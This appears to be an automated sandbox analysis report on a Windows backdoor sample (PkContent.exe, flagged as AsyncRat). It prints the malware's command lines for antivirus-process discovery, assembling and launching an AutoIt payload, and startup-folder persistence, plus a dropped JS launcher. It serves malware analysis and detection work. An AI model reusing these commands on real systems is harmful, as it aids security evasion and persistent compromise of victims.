Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_007933B7
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifAPI coverage: 4.9 %
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrAPI coverage: 4.7 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_007D4005
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_007D494A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_007D3CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_007DC2FF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DCD14 FindFirstFileW,FindClose,11_2_007DCD14
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_007DCD9F
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_007DF5D8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_007DF735
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_007DFA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00914005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00914005
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0091494A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0091C2FF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0091CD9F
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091CD14 FindFirstFileW,FindClose,17_2_0091CD14
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0091F5D8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0091F735
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0091FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00913CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00913CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00785D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00785D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\724598\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\724598Jump to behavior
Source: Thermal.pif, 0000000B.00000002.3937037466.0000000001109000.00000004.00000020.00020000.00000000.sdmp, HermesKey.scr, 00000011.00000002.3936909663.000000000150A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E45D5 BlockInput,11_2_007E45D5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00785240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_007A5CAC
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_007C88CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079A354 SetUnhandledExceptionFilter,11_2_0079A354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0079A385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_008DA385
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DA354 SetUnhandledExceptionFilter,17_2_008DA354
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C9369 LogonUserW,11_2_007C9369
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00785240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00785240
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D1AC6 SendInput,keybd_event,11_2_007D1AC6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D51E2 mouse_event,11_2_007D51E2
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exit
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & echo url="c:\users\user\appdata\local\guardkey solutions\hermeskey.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\hermeskey.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_007C88CD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_007D4F1C
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029E5000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp, Thermal.pif, 0000000B.00000003.2114572247.0000000003969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Thermal.pif, HermesKey.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079885B cpuid 11_2_0079885B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007B0030 GetLocalTime,__swprintf,11_2_007B0030
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007B0722 GetUserNameW,11_2_007B0722
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_007A416A
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: HermesKey.scrBinary or memory string: WIN_81
Source: HermesKey.scrBinary or memory string: WIN_XP
Source: HermesKey.scrBinary or memory string: WIN_XPe
Source: HermesKey.scrBinary or memory string: WIN_VISTA
Source: HermesKey.scrBinary or memory string: WIN_7
Source: HermesKey.scrBinary or memory string: WIN_8
Source: HermesKey.scr.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_007E696E
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_007E6E32
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0092696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_0092696E
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00926E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00926E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577543 Sample: PkContent.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 92 44 ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz 2->44 48 Antivirus / Scanner detection for submitted sample 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Sigma detected: Search for Antivirus process 2->52 54 4 other signatures 2->54 10 PkContent.exe 21 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->58 19 HermesKey.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\...\Thermal.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Thermal.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\HermesKey.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...\HermesKey.js, ASCII 21->38 dropped 56 Drops PE files with a suspicious file extension 21->56 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...\HermesKey.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PkContent.exe63%ReversingLabsWin32.Backdoor.AsyncRat
PkContent.exe100%AviraBDS/Agent.tfscq
PkContent.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr8%ReversingLabs
C:\Users\user\AppData\Local\Temp\724598\Thermal.pif8%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/JPkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp, HermesKey.scr, 00000011.00000002.3935835156.0000000000979000.00000002.00000001.01000000.00000008.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drfalse
      high
      http://nsis.sf.net/NSIS_ErrorErrorPkContent.exefalse
        high
        https://www.autoitscript.com/autoit3/PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drfalse
          high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577543
          Start date and time:2024-12-18 15:29:44 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:PkContent.exe
          Detection:MAL
          Classification:mal92.expl.evad.winEXE@28/14@2/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 102
          • Number of non-executed functions: 291
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: PkContent.exe
          TimeTypeDescription
          15:30:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
          No context
          No context
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrldqj18tn.exeGet hashmaliciousUnknownBrowse
            ldqj18tn.exeGet hashmaliciousUnknownBrowse
              EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                  S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                    PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                      l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                        duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                          pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                            C:\Users\user\AppData\Local\Temp\724598\Thermal.pifldqj18tn.exeGet hashmaliciousUnknownBrowse
                              ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                  RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                    S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                      PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                        l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                            pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):176
                                              Entropy (8bit):4.784166343619961
                                              Encrypted:false
                                              SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5iQERuAcCwPcTFZo5uWAX+aJp6/h4EkD5i6:RiJBJHonwWDaJ0/hJkDB+uAcBwFywWDq
                                              MD5:D85C354F477007A7AC2581AC9BFF7144
                                              SHA1:41015C3F57D442673E42CB162790AE5B39DDB96E
                                              SHA-256:82B7BAD61EC9ED1929B79C435AA4BBCD80F23608E6BC7F61FA24446A36AD65EF
                                              SHA-512:59AB7A7C992D88227AB1B96922F5024CD11DEBF23E872C3486BE2DDBD782D928BBC98DEF0F1DFB9115E3ECED1C0796AB312338E5CC42AAFBD1A7B3D3949B23CB
                                              Malicious:true
                                              Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\HermesKey.scr\" \"C:\\Users\\user\\AppData\\Local\\GuardKey Solutions\\g\"")
                                              Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):893608
                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
